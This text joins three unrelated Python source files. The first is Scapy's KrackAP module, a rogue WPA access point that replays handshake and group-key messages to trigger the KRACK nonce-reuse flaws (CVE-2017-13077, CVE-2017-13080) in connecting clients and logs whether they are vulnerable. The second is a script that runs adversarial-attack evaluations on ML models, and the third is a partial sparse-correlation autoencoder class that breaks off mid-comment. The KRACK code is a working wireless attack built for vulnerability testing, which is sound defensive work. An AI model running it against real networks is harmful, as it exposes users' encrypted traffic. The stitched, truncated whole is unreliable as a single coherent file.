from scapy.volatile import RandBin
from scapy.modules.krack.crypto import parse_data_pkt, parse_TKIP_hdr, \
build_TKIP_payload, check_MIC_ICV, MICError, ICVError, build_MIC_ICV, \
customPRF512, ARC4_encrypt
class DHCPOverWPA(DHCP_am):
"""Wrapper over DHCP_am to send and recv inside a WPA channel"""
def __init__(self, send_func, *args, **kwargs):
super(DHCPOverWPA, self).__init__(*args, **kwargs)
self.send_function = send_func
def sniff(self, *args, **kwargs):
# Do not sniff, use a direct call to 'replay(pkt)' instead
return
class KrackAP(Automaton):
"""Tiny WPA AP for detecting client vulnerable to KRACK attacks defined in:
"Key Reinstallation Attacks: Forcing Nonce Reuse in WPA2"
Example of use:
KrackAP(
iface="mon0", # A monitor interface
ap_mac='11:22:33:44:55:66', # MAC to use
ssid="TEST_KRACK", # SSID
passphrase="testtest", # Associated passphrase
).run()
Then, on the target device, connect to "TEST_KRACK" using "testtest" as the
passphrase.
The output logs will indicate if one of the CVE have been triggered.
"""
# Number of "GTK rekeying -> ARP replay" attempts. The vulnerability may not # noqa: E501
# be detected the first time. Several attempt implies the client has been
# likely patched
ARP_MAX_RETRY = 50
def __init__(self, *args, **kargs):
kargs.setdefault("ll", conf.L2socket)
kargs.setdefault("monitor", True)
super(KrackAP, self).__init__(*args, **kargs)
def parse_args(self, ap_mac, ssid, passphrase,
channel=None,
# KRACK attack options
double_3handshake=True,
encrypt_3handshake=True,
wait_3handshake=0,
double_gtk_refresh=True,
arp_target_ip=None,
arp_source_ip=None,
wait_gtk=10,
**kwargs):
"""
Mandatory arguments:
@iface: interface to use (must be in monitor mode)
@ap_mac: AP's MAC
@ssid: AP's SSID
@passphrase: AP's Passphrase (min 8 char.)
Optional arguments:
@channel: used by the interface. Default 6, autodetected on windows
Krack attacks options:
- Msg 3/4 handshake replay:
double_3handshake: double the 3/4 handshake message
encrypt_3handshake: encrypt the second 3/4 handshake message
wait_3handshake: time to wait (in sec.) before sending the second 3/4
- double GTK rekeying:
double_gtk_refresh: double the 1/2 GTK rekeying message
wait_gtk: time to wait (in sec.) before sending the GTK rekeying
arp_target_ip: Client IP to use in ARP req. (to detect attack success)
If None, use a DHCP server
arp_source_ip: Server IP to use in ARP req. (to detect attack success)
If None, use the DHCP server gateway address
"""
super(KrackAP, self).parse_args(**kwargs)
# Main AP options
self.mac = ap_mac
self.ssid = ssid
self.passphrase = passphrase
if channel is None:
if WINDOWS:
try:
channel = kwargs.get("iface", conf.iface).channel()
except (Scapy_Exception, AttributeError):
channel = 6
else:
channel = 6
self.channel = channel
# Internal structures
self.last_iv = None
self.client = None
self.seq_num = count()
self.replay_counter = count()
self.time_handshake_end = None
self.dhcp_server = DHCPOverWPA(send_func=self.send_ether_over_wpa,
pool=Net("192.168.42.128/25"),
network="192.168.42.0/24",
gw="192.168.42.1")
self.arp_sent = []
self.arp_to_send = 0
self.arp_retry = 0
# Bit 0: 3way handshake sent
# Bit 1: GTK rekeying sent
# Bit 2: ARP response obtained
self.krack_state = 0
# Krack options
self.double_3handshake = double_3handshake
self.encrypt_3handshake = encrypt_3handshake
self.wait_3handshake = wait_3handshake
self.double_gtk_refresh = double_gtk_refresh
self.arp_target_ip = arp_target_ip
if arp_source_ip is None:
# Use the DHCP server Gateway address
arp_source_ip = self.dhcp_server.gw
self.arp_source_ip = arp_source_ip
self.wait_gtk = wait_gtk
# May take several seconds
self.install_PMK()
def run(self, *args, **kwargs):
log_runtime.warning("AP started with ESSID: %s, BSSID: %s",
self.ssid, self.mac)
super(KrackAP, self).run(*args, **kwargs)
# Key utils
@staticmethod
def gen_nonce(size):
"""Return a nonce of @size element of random bytes as a string"""
return raw(RandBin(size))
def install_PMK(self):
"""Compute and install the PMK"""
self.pmk = PBKDF2HMAC(
algorithm=hashes.SHA1(),
length=32,
salt=self.ssid.encode(),
iterations=4096,
backend=default_backend(),
).derive(self.passphrase.encode())
def install_unicast_keys(self, client_nonce):
"""Use the client nonce @client_nonce to compute and install
PTK, KCK, KEK, TK, MIC (AP -> STA), MIC (STA -> AP)
"""
pmk = self.pmk
anonce = self.anonce
snonce = client_nonce
amac = mac2str(self.mac)
smac = mac2str(self.client)
# Compute PTK
self.ptk = customPRF512(pmk, amac, smac, anonce, snonce)
        # Extract derived keys
self.kck = self.ptk[:16]
self.kek = self.ptk[16:32]
self.tk = self.ptk[32:48]
self.mic_ap_to_sta = self.ptk[48:56]
self.mic_sta_to_ap = self.ptk[56:64]
# Reset IV
self.client_iv = count()
def install_GTK(self):
"""Compute a new GTK and install it alongs
MIC (AP -> Group = broadcast + multicast)
"""
# Compute GTK
self.gtk_full = self.gen_nonce(32)
self.gtk = self.gtk_full[:16]
        # Extract derived keys
self.mic_ap_to_group = self.gtk_full[16:24]
# Reset IV
self.group_iv = count()
# Packet utils
def build_ap_info_pkt(self, layer_cls, dest):
"""Build a packet with info describing the current AP
For beacon / proberesp use
"""
return RadioTap() \
/ Dot11(addr1=dest, addr2=self.mac, addr3=self.mac) \
/ layer_cls(timestamp=0, beacon_interval=100,
cap='ESS+privacy') \
/ Dot11Elt(ID="SSID", info=self.ssid) \
/ Dot11EltRates(rates=[130, 132, 139, 150, 12, 18, 24, 36]) \
/ Dot11Elt(ID="DSset", info=chb(self.channel)) \
/ Dot11EltRSN(group_cipher_suite=RSNCipherSuite(cipher=0x2),
pairwise_cipher_suites=[RSNCipherSuite(cipher=0x2)],
akm_suites=[AKMSuite(suite=0x2)])
@staticmethod
def build_EAPOL_Key_8021X2004(
key_information,
replay_counter,
nonce,
data=None,
key_mic=None,
key_data_encrypt=None,
key_rsc=0,
key_id=0,
key_descriptor_type=2, # EAPOL RSN Key
):
pkt = EAPOL(version="802.1X-2004", type="EAPOL-Key")
key_iv = KrackAP.gen_nonce(16)
assert key_rsc == 0 # Other values unsupported
assert key_id == 0 # Other values unsupported
payload = b"".join([
chb(key_descriptor_type),
struct.pack(">H", key_information),
b'\x00\x20', # Key length
struct.pack(">Q", replay_counter),
nonce,
key_iv,
struct.pack(">Q", key_rsc),
struct.pack(">Q", key_id),
])
# MIC field is set to 0's during MIC computation
offset_MIC = len(payload)
payload += b'\x00' * 0x10
if data is None and key_mic is None and key_data_encrypt is None:
# If key is unknown and there is no data, no MIC is needed
# Example: handshake 1/4
payload += b'\x00' * 2 # Length
return pkt / Raw(load=payload)
assert data is not None
assert key_mic is not None
assert key_data_encrypt is not None
# Skip 256 first bytes
# REF: 802.11i 8.5.2
# Key Descriptor Version 1:
# ...
# No padding shall be used. The encryption key is generated by
# concatenating the EAPOL-Key IV field and the KEK. The first 256 octets # noqa: E501
# of the RC4 key stream shall be discarded following RC4 stream cipher
# initialization with the KEK, and encryption begins using the 257th key # noqa: E501
# stream octet.
enc_data = ARC4_encrypt(key_iv + key_data_encrypt, data, skip=256)
payload += struct.pack(">H", len(data))
payload += enc_data
# Compute MIC and set at the right place
temp_mic = pkt.copy()
temp_mic /= Raw(load=payload)
to_mic = raw(temp_mic[EAPOL])
mic = hmac.new(key_mic, to_mic, hashlib.md5).digest()
final_payload = payload[:offset_MIC] + mic + payload[offset_MIC + len(mic):] # noqa: E501
assert len(final_payload) == len(payload)
return pkt / Raw(load=final_payload)
def build_GTK_KDE(self):
"""Build the Key Data Encapsulation for GTK
KeyID: 0
Ref: 802.11i p81
"""
return b''.join([
b'\xdd', # Type KDE
chb(len(self.gtk_full) + 6),
b'\x00\x0f\xac', # OUI
b'\x01', # GTK KDE
b'\x00\x00', # KeyID - Tx - Reserved x2
self.gtk_full,
])
def send_wpa_enc(self, data, iv, seqnum, dest, mic_key,
key_idx=0, additionnal_flag=["from-DS"],
encrypt_key=None):
"""Send an encrypted packet with content @data, using IV @iv,
sequence number @seqnum, MIC key @mic_key
"""
if encrypt_key is None:
encrypt_key = self.tk
rep = RadioTap()
rep /= Dot11(
addr1=dest,
addr2=self.mac,
addr3=self.mac,
FCfield="+".join(['protected'] + additionnal_flag),
SC=(next(self.seq_num) << 4),
subtype=0,
type="Data",
)
# Assume the packet is sent by our AP -> use self.mac as source
# Encapsulate in TKIP with the Michael MIC and ICV
data_to_enc = build_MIC_ICV(raw(data), mic_key, self.mac, dest)
# Header TKIP + payload
rep /= Raw(build_TKIP_payload(data_to_enc, iv, self.mac, encrypt_key))
self.send(rep)
return rep
def send_wpa_to_client(self, data, **kwargs):
kwargs.setdefault("encrypt_key", self.tk)
return self.send_wpa_enc(data, next(self.client_iv),
next(self.seq_num), self.client,
self.mic_ap_to_sta, **kwargs)
def send_wpa_to_group(self, data, dest="ff:ff:ff:ff:ff:ff", **kwargs):
kwargs.setdefault("encrypt_key", self.gtk)
return self.send_wpa_enc(data, next(self.group_iv),
next(self.seq_num), dest,
self.mic_ap_to_group, **kwargs)
def send_ether_over_wpa(self, pkt, **kwargs):
"""Send an Ethernet packet using the WPA channel
Extra arguments will be ignored, and are just left for compatibility
"""
payload = LLC() / SNAP() / pkt[Ether].payload
dest = pkt.dst
if dest == "ff:ff:ff:ff:ff:ff":
self.send_wpa_to_group(payload, dest)
else:
assert dest == self.client
self.send_wpa_to_client(payload)
def deal_common_pkt(self, pkt):
# Send to DHCP server
# LLC / SNAP to Ether
if SNAP in pkt:
ether_pkt = Ether(src=self.client, dst=self.mac) / pkt[SNAP].payload # noqa: E501
self.dhcp_server.reply(ether_pkt)
# If an ARP request is made, extract client IP and answer
if ARP in pkt and \
pkt[ARP].op == 1 and pkt[ARP].pdst == self.dhcp_server.gw:
if self.arp_target_ip is None:
self.arp_target_ip = pkt[ARP].psrc
log_runtime.info("Detected IP: %s", self.arp_target_ip)
# Reply
ARP_ans = LLC() / SNAP() / ARP(
op="is-at",
psrc=self.arp_source_ip,
pdst=self.arp_target_ip,
hwsrc=self.mac,
hwdst=self.client,
)
self.send_wpa_to_client(ARP_ans)
# States
@ATMT.state(initial=True)
def WAIT_AUTH_REQUEST(self):
log_runtime.debug("State WAIT_AUTH_REQUEST")
@ATMT.state()
def AUTH_RESPONSE_SENT(self):
log_runtime.debug("State AUTH_RESPONSE_SENT")
@ATMT.state()
def ASSOC_RESPONSE_SENT(self):
log_runtime.debug("State ASSOC_RESPONSE_SENT")
@ATMT.state()
def WPA_HANDSHAKE_STEP_1_SENT(self):
log_runtime.debug("State WPA_HANDSHAKE_STEP_1_SENT")
@ATMT.state()
def WPA_HANDSHAKE_STEP_3_SENT(self):
log_runtime.debug("State WPA_HANDSHAKE_STEP_3_SENT")
@ATMT.state()
def KRACK_DISPATCHER(self):
log_runtime.debug("State KRACK_DISPATCHER")
@ATMT.state()
def ANALYZE_DATA(self):
log_runtime.debug("State ANALYZE_DATA")
@ATMT.timeout(ANALYZE_DATA, 1)
def timeout_analyze_data(self):
raise self.KRACK_DISPATCHER()
@ATMT.state()
def RENEW_GTK(self):
log_runtime.debug("State RENEW_GTK")
@ATMT.state()
def WAIT_GTK_ACCEPT(self):
log_runtime.debug("State WAIT_GTK_ACCEPT")
@ATMT.state()
def WAIT_ARP_REPLIES(self):
log_runtime.debug("State WAIT_ARP_REPLIES")
@ATMT.state(final=1)
def EXIT(self):
log_runtime.debug("State EXIT")
@ATMT.timeout(WAIT_GTK_ACCEPT, 1)
def timeout_wait_gtk_accept(self):
raise self.RENEW_GTK()
@ATMT.timeout(WAIT_AUTH_REQUEST, 0.1)
def timeout_waiting(self):
raise self.WAIT_AUTH_REQUEST()
@ATMT.action(timeout_waiting)
def send_beacon(self):
log_runtime.debug("Send a beacon")
rep = self.build_ap_info_pkt(Dot11Beacon, dest="ff:ff:ff:ff:ff:ff")
self.send(rep)
@ATMT.receive_condition(WAIT_AUTH_REQUEST)
def probe_request_received(self, pkt):
# Avoid packet from other interfaces
if RadioTap not in pkt:
return
if Dot11ProbeReq in pkt and pkt[Dot11Elt::{'ID': 0}].info == self.ssid:
raise self.WAIT_AUTH_REQUEST().action_parameters(pkt)
@ATMT.action(probe_request_received)
def send_probe_response(self, pkt):
rep = self.build_ap_info_pkt(Dot11ProbeResp, dest=pkt.addr2)
self.send(rep)
@ATMT.receive_condition(WAIT_AUTH_REQUEST)
def authent_received(self, pkt):
# Avoid packet from other interfaces
if RadioTap not in pkt:
return
if Dot11Auth in pkt and pkt.addr1 == pkt.addr3 == self.mac:
raise self.AUTH_RESPONSE_SENT().action_parameters(pkt)
@ATMT.action(authent_received)
def send_auth_response(self, pkt):
# Save client MAC for later
self.client = pkt.addr2
log_runtime.warning("Client %s connected!", self.client)
# Launch DHCP Server
self.dhcp_server.run()
rep = RadioTap()
rep /= Dot11(addr1=self.client, addr2=self.mac, addr3=self.mac)
rep /= Dot11Auth(seqnum=2, algo=pkt[Dot11Auth].algo,
status=pkt[Dot11Auth].status)
self.send(rep)
@ATMT.receive_condition(AUTH_RESPONSE_SENT)
def assoc_received(self, pkt):
if Dot11AssoReq in pkt and pkt.addr1 == pkt.addr3 == self.mac and \
pkt[Dot11Elt::{'ID': 0}].info == self.ssid:
raise self.ASSOC_RESPONSE_SENT().action_parameters(pkt)
@ATMT.action(assoc_received)
def send_assoc_response(self, pkt):
# Get RSN info
temp_pkt = pkt[Dot11Elt::{"ID": 48}].copy()
temp_pkt.remove_payload()
self.RSN = raw(temp_pkt)
# Avoid 802.11w, etc. (deactivate RSN capabilities)
self.RSN = self.RSN[:-2] + b"\x00\x00"
rep = RadioTap()
rep /= Dot11(addr1=self.client, addr2=self.mac, addr3=self.mac)
rep /= Dot11AssoResp()
rep /= Dot11EltRates(rates=[130, 132, 139, 150, 12, 18, 24, 36])
self.send(rep)
@ATMT.condition(ASSOC_RESPONSE_SENT)
def assoc_sent(self):
raise self.WPA_HANDSHAKE_STEP_1_SENT()
@ATMT.action(assoc_sent)
def send_wpa_handshake_1(self):
self.anonce = self.gen_nonce(32)
rep = RadioTap()
rep /= Dot11(
addr1=self.client,
addr2=self.mac,
addr3=self.mac,
FCfield='from-DS',
SC=(next(self.seq_num) << 4),
)
rep /= LLC(dsap=0xaa, ssap=0xaa, ctrl=3)
rep /= SNAP(OUI=0, code=0x888e) # 802.1X Authentication
rep /= self.build_EAPOL_Key_8021X2004(
key_information=0x89,
replay_counter=next(self.replay_counter),
nonce=self.anonce,
)
self.send(rep)
@ATMT.receive_condition(WPA_HANDSHAKE_STEP_1_SENT)
def wpa_handshake_1_sent(self, pkt):
# Avoid packet from other interfaces
if RadioTap not in pkt:
return
if EAPOL in pkt and pkt.addr1 == pkt.addr3 == self.mac and \
pkt[EAPOL].load[1:2] == b"\x01":
# Key MIC: set, Secure / Error / Request / Encrypted / SMK
# message: not set
raise self.WPA_HANDSHAKE_STEP_3_SENT().action_parameters(pkt)
@ATMT.action(wpa_handshake_1_sent)
def send_wpa_handshake_3(self, pkt):
# Both nonce have been exchanged, install keys
client_nonce = pkt[EAPOL].load[13:13 + 0x20]
self.install_unicast_keys(client_nonce)
# Check client MIC
# Data: full message with MIC place replaced by 0s
# https://stackoverflow.com/questions/15133797/creating-wpa-message-integrity-code-mic-with-python
client_mic = pkt[EAPOL].load[77:77 + 16]
client_data = raw(pkt[EAPOL]).replace(client_mic, b"\x00" * len(client_mic)) # noqa: E501
assert hmac.new(self.kck, client_data, hashlib.md5).digest() == client_mic # noqa: E501
rep = RadioTap()
rep /= Dot11(
addr1=self.client,
addr2=self.mac,
addr3=self.mac,
FCfield='from-DS',
SC=(next(self.seq_num) << 4),
)
rep /= LLC(dsap=0xaa, ssap=0xaa, ctrl=3)
rep /= SNAP(OUI=0, code=0x888e) # 802.1X Authentication
self.install_GTK()
data = self.RSN
data += self.build_GTK_KDE()
eap = self.build_EAPOL_Key_8021X2004(
key_information=0x13c9,
replay_counter=next(self.replay_counter),
nonce=self.anonce,
data=data,
key_mic=self.kck,
key_data_encrypt=self.kek,
)
self.send(rep / eap)
@ATMT.receive_condition(WPA_HANDSHAKE_STEP_3_SENT)
def wpa_handshake_3_sent(self, pkt):
# Avoid packet from other interfaces
if RadioTap not in pkt:
return
if EAPOL in pkt and pkt.addr1 == pkt.addr3 == self.mac and \
pkt[EAPOL].load[1:3] == b"\x03\x09":
self.time_handshake_end = time.time()
raise self.KRACK_DISPATCHER()
@ATMT.condition(KRACK_DISPATCHER)
def krack_dispatch(self):
now = time.time()
# Handshake 3/4 replay
if self.double_3handshake and (self.krack_state & 1 == 0) and \
(now - self.time_handshake_end) > self.wait_3handshake:
log_runtime.info("Trying to trigger CVE-2017-13077")
raise self.ANALYZE_DATA().action_parameters(send_3handshake=True)
# GTK rekeying
if (self.krack_state & 2 == 0) and \
(now - self.time_handshake_end) > self.wait_gtk:
raise self.ANALYZE_DATA().action_parameters(send_gtk=True)
# Fallback in data analysis
raise self.ANALYZE_DATA().action_parameters()
@ATMT.action(krack_dispatch)
def krack_proceed(self, send_3handshake=False, send_gtk=False):
if send_3handshake:
rep = RadioTap()
rep /= Dot11(
addr1=self.client,
addr2=self.mac,
addr3=self.mac,
FCfield='from-DS',
SC=(next(self.seq_num) << 4),
subtype=0,
type="Data",
)
rep /= LLC(dsap=0xaa, ssap=0xaa, ctrl=3)
rep /= SNAP(OUI=0, code=0x888e) # 802.1X Authentication
data = self.RSN
data += self.build_GTK_KDE()
eap_2 = self.build_EAPOL_Key_8021X2004(
# Key information 0x13c9:
# ARC4 HMAC-MD5, Pairwise Key, Install, KEY ACK, KEY MIC, Secure, # noqa: E501
# Encrypted, SMK
key_information=0x13c9,
replay_counter=next(self.replay_counter),
nonce=self.anonce,
data=data,
key_mic=self.kck,
key_data_encrypt=self.kek,
)
rep /= eap_2
if self.encrypt_3handshake:
self.send_wpa_to_client(rep[LLC])
else:
self.send(rep)
self.krack_state |= 1
if send_gtk:
self.krack_state |= 2
# Renew the GTK
self.install_GTK()
raise self.RENEW_GTK()
@ATMT.receive_condition(ANALYZE_DATA)
def get_data(self, pkt):
# Avoid packet from other interfaces
if RadioTap not in pkt:
return
# Skip retries
if pkt[Dot11].FCfield.retry:
return
# Skip unencrypted frames (TKIP relies on encrypted packets)
if not pkt[Dot11].FCfield.protected:
return
# Dot11.type 2: Data
if pkt.type == 2 and Raw in pkt and pkt.addr1 == self.mac:
# Do not check pkt.addr3, frame can be broadcast
raise self.KRACK_DISPATCHER().action_parameters(pkt)
@ATMT.action(get_data)
def extract_iv(self, pkt):
# Get IV
TSC, _, _ = parse_TKIP_hdr(pkt)
iv = TSC[0] | (TSC[1] << 8) | (TSC[2] << 16) | (TSC[3] << 24) | \
(TSC[4] << 32) | (TSC[5] << 40)
log_runtime.info("Got a packet with IV: %s", hex(iv))
if self.last_iv is None:
self.last_iv = iv
else:
if iv <= self.last_iv:
log_runtime.warning("IV re-use!! Client seems to be "
"vulnerable to handshake 3/4 replay "
"(CVE-2017-13077)"
)
data_clear = None
# Normal decoding
data = parse_data_pkt(pkt, self.tk)
try:
data_clear = check_MIC_ICV(data, self.mic_sta_to_ap, pkt.addr2,
pkt.addr3)
except (ICVError, MICError):
pass
# Decoding with a 0's TK
if data_clear is None:
data = parse_data_pkt(pkt, b"\x00" * len(self.tk))
try:
mic_key = b"\x00" * len(self.mic_sta_to_ap)
data_clear = check_MIC_ICV(data, mic_key, pkt.addr2, pkt.addr3)
log_runtime.warning("Client has installed an all zero "
"encryption key (TK)!!")
except (ICVError, MICError):
pass
if data_clear is None:
log_runtime.warning("Unable to decode the packet, something went "
"wrong")
log_runtime.debug(hexdump(pkt, dump=True))
self.deal_common_pkt(pkt)
return
log_runtime.debug(hexdump(data_clear, dump=True))
pkt = LLC(data_clear)
log_runtime.debug(repr(pkt))
self.deal_common_pkt(pkt)
@ATMT.condition(RENEW_GTK)
def gtk_pkt_1(self):
raise self.WAIT_GTK_ACCEPT()
@ATMT.action(gtk_pkt_1)
def send_renew_gtk(self):
rep_to_enc = LLC(dsap=0xaa, ssap=0xaa, ctrl=3)
rep_to_enc /= SNAP(OUI=0, code=0x888e) # 802.1X Authentication
data = self.build_GTK_KDE()
eap = self.build_EAPOL_Key_8021X2004(
# Key information 0x1381:
# ARC4 HMAC-MD5, Group Key, KEY ACK, KEY MIC, Secure, Encrypted,
# SMK
key_information=0x1381,
replay_counter=next(self.replay_counter),
nonce=self.anonce,
data=data,
key_mic=self.kck,
key_data_encrypt=self.kek,
)
rep_to_enc /= eap
self.send_wpa_to_client(rep_to_enc)
@ATMT.receive_condition(WAIT_GTK_ACCEPT)
def get_gtk_2(self, pkt):
# Avoid packet from other interfaces
if RadioTap not in pkt:
return
# Skip retries
if pkt[Dot11].FCfield.retry:
return
# Skip unencrypted frames (TKIP relies on encrypted packets)
if not pkt[Dot11].FCfield.protected:
return
# Normal decoding
try:
data = parse_data_pkt(pkt, self.tk)
except ValueError:
return
try:
data_clear = check_MIC_ICV(data, self.mic_sta_to_ap, pkt.addr2,
pkt.addr3)
except (ICVError, MICError):
return
pkt_clear = LLC(data_clear)
if EAPOL in pkt_clear and pkt.addr1 == pkt.addr3 == self.mac and \
pkt_clear[EAPOL].load[1:3] == b"\x03\x01":
raise self.WAIT_ARP_REPLIES()
@ATMT.action(get_gtk_2)
def send_arp_req(self):
if self.krack_state & 4 == 0:
# Set the address for future uses
self.arp_target_ip = self.dhcp_server.leases.get(self.client,
self.arp_target_ip) # noqa: E501
assert self.arp_target_ip is not None
# Send the first ARP requests, for control test
log_runtime.info("Send ARP who-was from '%s' to '%s'",
self.arp_source_ip,
self.arp_target_ip)
arp_pkt = self.send_wpa_to_group(
LLC() / SNAP() / ARP(op="who-has",
psrc=self.arp_source_ip,
pdst=self.arp_target_ip,
hwsrc=self.mac),
dest='ff:ff:ff:ff:ff:ff',
)
self.arp_sent.append(arp_pkt)
else:
if self.arp_to_send < len(self.arp_sent):
# Re-send the ARP requests already sent
self.send(self.arp_sent[self.arp_to_send])
self.arp_to_send += 1
else:
# Re-send GTK
self.arp_to_send = 0
self.arp_retry += 1
log_runtime.info("Trying to trigger CVE-2017-13080 %d/%d",
self.arp_retry, self.ARP_MAX_RETRY)
if self.arp_retry > self.ARP_MAX_RETRY:
# We have retried ARP_MAX_RETRY times to re-send the GTK and the already sent ARPs; give up
log_runtime.warning("Client is likely not vulnerable to "
"CVE-2017-13080")
raise self.EXIT()
raise self.RENEW_GTK()
@ATMT.timeout(WAIT_ARP_REPLIES, 0.5)
def resend_arp_req(self):
self.send_arp_req()
raise self.WAIT_ARP_REPLIES()
@ATMT.receive_condition(WAIT_ARP_REPLIES)
def get_arp(self, pkt):
# Avoid packet from other interfaces
if RadioTap not in pkt:
return
# Skip retries
if pkt[Dot11].FCfield.retry:
return
# Skip unencrypted frames (TKIP relies on encrypted packets)
if not pkt[Dot11].FCfield.protected:
return
# Dot11.type 2: Data
if pkt.type == 2 and Raw in pkt and pkt.addr1 == self.mac:
# Do not check pkt.addr3, frame can be broadcast
raise self.WAIT_ARP_REPLIES().action_parameters(pkt)
@ATMT.action(get_arp)
def check_arp_reply(self, pkt):
data = parse_data_pkt(pkt, self.tk)
try:
data_clear = check_MIC_ICV(data, self.mic_sta_to_ap, pkt.addr2,
pkt.addr3)
except (ICVError, MICError):
return
decoded_pkt = LLC(data_clear)
log_runtime.debug(hexdump(decoded_pkt, dump=True))
log_runtime.debug(repr(decoded_pkt))
self.deal_common_pkt(decoded_pkt)
if ARP not in decoded_pkt:
return
# ARP.op 2: is-at
if decoded_pkt[ARP].op == 2 and \
decoded_pkt[ARP].psrc == self.arp_target_ip and \
decoded_pkt[ARP].pdst == self.arp_source_ip:
# Got the expected ARP
if self.krack_state & 4 == 0:
# First time, normal behavior
log_runtime.info("Got ARP reply, this is normal")
self.krack_state |= 4
log_runtime.info("Trying to trigger CVE-2017-13080")
raise self.RENEW_GTK()
else:
# Second time, the packet has been accepted twice!
log_runtime.warning("Broadcast packet accepted twice!! "
"(CVE-2017-13080)")
|
the-stack_106_15808
|
#pylint: disable-all
"""
Test a final model with distance attacks
"""
import os
import copy
import argparse
import subprocess
import yaml
if __name__ == "__main__":
TEST_TYPES = {
"BIM_L2": {
"adversary_type": "L2BasicIterativeAttack",
"distance_type": "MeanSquaredDistance"
},
"BIM_LINF": {
"adversary_type": "LinfinityBasicIterativeAttack",
"distance_type": "Linfinity"
},
"CW_L2": {
"adversary_type": "CarliniWagnerL2Attack",
"distance_type": "MeanSquaredDistance"
},
"DEEPFOOL_L2": {
"adversary_type": "DeepFoolL2Attack",
"distance_type": "MeanSquaredDistance"
}
}
parser = argparse.ArgumentParser()
parser.add_argument("cfg_file")
parser.add_argument("load")
parser.add_argument("--type", "-t", required=True, action="append", default=[], help="distance attack type", choices=list(TEST_TYPES.keys()) + [t.lower() for t in TEST_TYPES.keys()])
parser.add_argument("--gpu", default=0, type=int)
args = parser.parse_args()
with open(args.cfg_file, "r") as rf:
base_cfg = yaml.load(rf, Loader=yaml.FullLoader)
test_cfg_files = []
log_files = []
for test_type in args.type:
cfg = copy.deepcopy(base_cfg)
cfg["objective_type"] = "adversarial_distance_objective"
cfg["objective_cfg"] = {}
cfg["objective_cfg"]["mean"] = base_cfg["objective_cfg"]["mean"]
cfg["objective_cfg"]["std"] = base_cfg["objective_cfg"]["std"]
cfg["objective_cfg"]["num_classes"] = base_cfg["objective_cfg"].get(
"num_classes",
base_cfg["final_model_cfg"].get("num_classes",10))
cfg["objective_cfg"].update(TEST_TYPES[test_type.upper()])
test_cfg_files.append("{}-test-{}.yaml".format(args.cfg_file, test_type.upper()))
log_files.append(os.path.join(args.load, "test-{}.log".format(test_type.upper())))
with open(test_cfg_files[-1], "w") as wf:
yaml.dump(cfg, wf)
for test_type, test_cfg_file, log_file in zip(args.type, test_cfg_files, log_files):
print("****Test {}. Test cfg: {}. Log saved to {}.****".format(test_type, test_cfg_file, log_file))
subprocess.check_call("awnas test --load {} {} --gpus {} -s test 2>&1 | tee {}".format(args.load, test_cfg_file, args.gpu, log_file), shell=True)
|
the-stack_106_15809
|
import numpy as np
from multiphenotype_utils import (get_continuous_features_as_matrix, add_id, remove_id_and_get_mat,
partition_dataframe_into_binary_and_continuous, divide_idxs_into_batches)
import pandas as pd
import tensorflow as tf
from dimreducer import DimReducer
from general_autoencoder import GeneralAutoencoder
from standard_autoencoder import StandardAutoencoder
from variational_autoencoder import VariationalAutoencoder
from variational_age_autoencoder import VariationalAgeAutoencoder
import tensorflow.compat.v1 as tf
tf.disable_v2_behavior()
class SparseCorrelationVariationalAgeAutoencoder(VariationalAgeAutoencoder):
"""
Implements a variational autoencoder with an age prior and sparsity on the X-Z correlation matrix.
"""
def __init__(self,
k_age,
Z_age_coef,
sparsity_weighting = .1,
batch_size=512,
min_corr_value = .05,
use_age_adjusted_X=True,
**kwargs):
super(SparseCorrelationVariationalAgeAutoencoder, self).__init__(k_age = k_age,
Z_age_coef = Z_age_coef,
batch_size=batch_size,
**kwargs)
self.sparsity_weighting = sparsity_weighting # weighting on the L1 X-Z correlation matrix loss.
self.use_age_adjusted_X = use_age_adjusted_X # if True, computes correlations with the age state using X that has been decorrelated with age.
self.min_corr_value = min_corr_value # correlations below this value are treated as equivalent.
def compute_pearson_correlation(self, v1, v2):
"""
slow (non-vectorized) way of computing the pearson correlation.
pearson correlation:
https://en.wikipedia.org/wiki/Correlation_and_dependence
Not being used at present.
Verified that this matches up with pearsonr(x, y) for random vectors.
"""
# The mean and variance are calculated by aggregating the contents of x across axes.
# If x is 1-D and axes = [0] this is just the mean and variance of a vector.
mu_1, variance_1 = tf.nn.moments(v1, axes=[0])
mu_2, variance_2 = tf.nn.moments(v2, axes=[0])
sigma_1 = tf.sqrt(variance_1)
sigma_2 = tf.sqrt(variance_2)
pearsonr = tf.reduce_mean((v1 - mu_1) * (v2 - mu_2)) / (sigma_1 * sigma_2)
return pearsonr
def compute_correlation_sparsity_loss(self, Z, X):
"""
this is a vectorized version of the above function which is faster but equivalent.
Verified that it agrees with pearsonr on random matrices.
"""
mu_X, variance_X = tf.nn.moments(X, axes=[0])
mu_Z, variance_Z = tf.nn.moments(Z, axes=[0])
std_X = tf.reshape(tf.sqrt(variance_X), shape=[len(self.feature_names), 1])
std_Z = tf.reshape(tf.sqrt(variance_Z), shape=[1, tf.shape(variance_Z)[0]])
zero_mean_X = X - mu_X # this subtracts off the mean of each column of X.
zero_mean_Z = Z - mu_Z # similarly for Z.
n_samples = tf.cast(tf.shape(X)[0], tf.float32)
expected_product = tf.matmul(tf.transpose(zero_mean_X), zero_mean_Z) / n_samples
product_of_stds = tf.matmul(std_X, std_Z)
pearsonr_matrix = expected_product / product_of_stds
clipped_pearsonr_matrix = tf.clip_by_value(tf.abs(pearsonr_matrix), self.min_corr_value, np.inf)
sparsity_loss = tf.reduce_sum(clipped_pearsonr_matrix)
return sparsity_loss
def set_up_regularization_loss_structure(self):
"""
This function sets up the basic loss structure. Should define self.reg_loss.
"""
self.reg_loss = self.get_regularization_loss(self.ages,
self.Z_mu,
self.Z_sigma,
self.Z,
self.X,
self.age_adjusted_X)
def get_regularization_loss(self, ages, Z_mu, Z_sigma, Z, X, age_adjusted_X):
"""
Adds a correlation sparsity loss to the regularization term.
"""
kl_div_loss = super(SparseCorrelationVariationalAgeAutoencoder, self).get_regularization_loss(ages,
Z_mu,
Z_sigma)
if self.use_age_adjusted_X:
# for non-age states, use correlation with X to compute sparsity loss.
# for age states, use correlation with age_adjusted_X.
sparsity_loss = self.compute_correlation_sparsity_loss(Z[:, self.k_age:], X)
if self.k_age > 0:
sparsity_loss += self.compute_correlation_sparsity_loss(Z[:, :self.k_age], age_adjusted_X)
else:
# if we're not using age adjusted X for the age states, just compute the sparse correlation matrix with X.
sparsity_loss = self.compute_correlation_sparsity_loss(Z, X)
regularization_loss = kl_div_loss + sparsity_loss * self.sparsity_weighting
return regularization_loss
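# Hedged NumPy sketch (not part of the original class): the vectorized X-Z Pearson
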